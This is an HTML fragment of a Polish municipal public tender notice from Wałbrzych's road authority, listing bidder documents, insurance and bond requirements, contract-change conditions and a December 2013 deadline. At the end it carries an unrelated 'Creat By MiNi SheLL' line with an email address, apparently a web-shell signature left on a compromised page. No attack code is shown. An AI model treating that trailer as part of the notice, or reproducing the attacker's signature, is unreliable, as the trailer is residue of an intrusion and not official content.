<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca, który wygra przetarg przed podpisaniem umowy zobowiązany będzie przedstawić dokumenty ubezpieczeniowe (polisy) potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, na kwotę co najmniej 3.500.000,00 zł. (Wykonawca zobowiązany jest do przedłożenia polis i dowodów uiszczenia składki). 
Wykonawca, który wygra przetarg przed podpisaniem umowy zobowiązany będzie  do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10 % ceny całkowitej (wynagrodzenia brutto) podanej  w ofercie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza ewentualną zmianę następujących istotnych postanowień umownych:
1.	w zakresie wynikającym z uregulowań prawnych wprowadzonych w życie po dacie podpisania umowy, wywołujących potrzebę zmiany umowy,
2.	osób wymienionych w ofercie Wykonawcy pod warunkiem wyrażenia zgody przez Zamawiającego, oraz że osoby te będą spełniały warunki opisane w SIWZ,
3.	zakresu przedmiotu umowy oraz sposobu wykonania przedmiotu umowy wraz ze skutkami wprowadzenia takiej zmiany, przy czym zmiana spowodowana może być okolicznościami zaistniałymi w trakcie realizacji przedmiotu umowy, np. zaistnienie warunków faktycznych wpływających na zakres lub sposób wykonywania przedmiotu umowy, 
4.	zmiana dokonana na podstawie art. 23 pkt 1 ustawy - Prawo budowlane - zmiana 
w rozwiązaniach projektowych, jeżeli są one uzasadnione koniecznością zwiększenia bezpieczeństwa realizacji robót budowlanych lub usprawnienia procesu budowy,
5.	zmiana dokonana na podstawie art. 20 ust. 1 pkt 4 lit. b) ustawy - Prawo budowlane - uzgodniona możliwość wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub Inspektora nadzoru,
6.	zmiany dokonane zostały podczas wykonywania robót i nie odstępują w sposób istotny od zatwierdzonego projektu lub warunków pozwolenia na budowę,
7.	w ramach art. 36a ust. 5 ustawy - Prawo budowlane i dokonane zostały zgodnie
z zapisami art. 36a ust. 6 ustawy - Prawo budowlane, spełniając zapisy art. 57 ust. 2 ustawy - Prawo budowlane,
8.	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody o znacznych rozmiarach, 
9.	wystąpienie przyczyn, których nie można było przewidzieć w chwili publikacji ogłoszenia o zamówieniu, powodujące konieczność wprowadzenia zmiany postanowień umowy,
10.	terminu realizacji umowy - wskutek wystąpienia okoliczności niezależnych od stron umowy.

Zmiana będzie wprowadzona w formie pisemnej. 
Strona wnioskująca o zmianę  umowy zobowiązana będzie wystąpić do drugiej strony umowy z pisemnym wnioskiem o dokonanie zmiany umowy przedstawiając przyczyny zmiany i jeżeli jest to konieczne zobowiązana będzie przedstawić odpowiednie dokumenty. Strona, która otrzymała wniosek, przedstawi swoje stanowisko w ciągu 7 dni licząc od dnia otrzymania kompletnego, z pełnym uzasadnieniem, wniosku drugiej strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdkium.walbrzych.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu, 58-300 Wałbrzych, ul. Matejki 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2013 godzina 12:00, miejsce: Zarząd Dróg, Komunikacji i Utrzymania Miasta w Wałbrzychu, 58-300 Wałbrzych, ul. Matejki 1 w sekretariacie, pokój nr 37.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com